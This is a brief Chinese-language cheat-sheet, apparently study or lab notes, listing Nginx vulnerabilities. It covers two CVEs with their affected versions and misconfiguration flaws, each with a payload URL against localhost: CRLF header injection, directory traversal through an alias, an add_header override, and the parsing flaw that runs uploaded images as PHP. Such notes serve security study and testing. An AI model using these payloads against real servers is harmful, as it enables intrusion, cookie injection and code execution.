CVE-2013-4547
影响范围
Nginx 0.8.41~1.4.3
Nginx 1.5.0~1.5.7
CVE-2017-7529越界读取缓存漏洞
影响范围
Nginx version 0.5.6 - 1.13.2
insecure-configuration
CRLF注入漏洞
Nginx会将$uri进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。
payload:http://127.0.0.1/%0a%0dSet-Cookie:%20a=1%0a%0d%0a%0d%0a<!–
目录穿越漏洞
payload:http://127.0.0.1:8081/files…/
add_header被覆盖
payload:http://127.0.0.1:8082/test2#
nginx解析漏洞
原请求为http://127.0.0.1/uploadfiles/nginx.png
payload为:http://127.0.0.1/uploadfiles/nginx.png/.php